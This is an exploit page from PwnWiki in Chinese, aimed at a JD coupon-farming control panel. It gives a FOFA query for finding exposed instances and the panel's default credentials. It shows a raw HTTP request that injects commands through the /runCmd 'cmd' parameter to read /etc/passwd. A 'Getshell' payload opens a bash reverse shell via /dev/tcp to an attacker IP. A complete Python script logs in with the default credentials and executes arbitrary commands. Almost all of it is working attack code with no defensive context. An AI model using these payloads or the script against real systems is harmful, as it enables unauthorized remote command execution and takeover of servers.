PWNWIK.COM
,
FOFA
title="京东薅羊毛控制面板"
默认账号密码
useradmin/supermanito
漏洞利用
发送如下请求包执行命令:
POST /runCmd HTTP/1.1 Host: XXX.XXX.XXX.XXX:5678 Content-Length: 50 Pragma: no-cache Cache-Control: no-cache Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U Connection: close cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
其中 cmd 参数存在命令注入。
Getshell
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
EXP
Usage:
python3 exploit.py -u http://xx.xx.xx.xx:5678 -c "command" python3 exploit.py -u http://127.0.0.1:5678 -c "cat /etc/passwd"
import requests import json import sys import argparse def login(url,username="useradmin",password="supermanito"): loginReq = requests.Session() payload = { "username":username, "password":password } headers1 = { "Accept": "*/*", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9" } headers = { "Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9" } loginReq.get(url, headers=headers1) content = loginReq.post(url + "auth",data=payload,headers=headers) response = json.loads(content.text) # print(response"err") # print(loginReq.cookies) if response"err" == 0: print("login success") return(loginReq) else: print("login failure") raise RuntimeError("Can't login,beacuse -> "+response"msg") def exploit(url,session,command): ''' POST form looks like POST /runCmd HTTP/1.1 Host: XXX.XXX.XXX.XXXX:5678 Content-Length: 51 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc Connection: close cmd=bash+jd.sh+bean_change%3Bifconfig%3B&delay=1000 ''' headers = { "Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close" } datas = { "cmd":"bash+jd.sh+bean_change;"+command+";", "delay":"1000" } response = session.post(url+"runCmd",data=datas,headers=headers) # print(session.cookies) objectResponse = json.loads(response.text) # print(objectResponse) if objectResponse"err" == 0: print("execute success","\n") print(objectResponse) print("$ "+command) for line in objectResponse"msg".split("\n"): print(line) else: print("execute failure") raise RuntimeError("Can't execute --> "+objectResponse"msg") if __name__ == "__main__" : parser = argparse.ArgumentParser(description='this is the EXP of JD fuck') parser.add_argument("-u",metavar="url",type=str,help="url there, e.g: http://127.0.0.1:5678/") parser.add_argument("-c",metavar="command",type=str,help="execute command, e.g: ls") # print(sys.argv1:) args = vars( parser.parse_args(sys.argv1:) ) url = args"u" command = args"c" exploit(url,login(url),command)
pwnwiki.com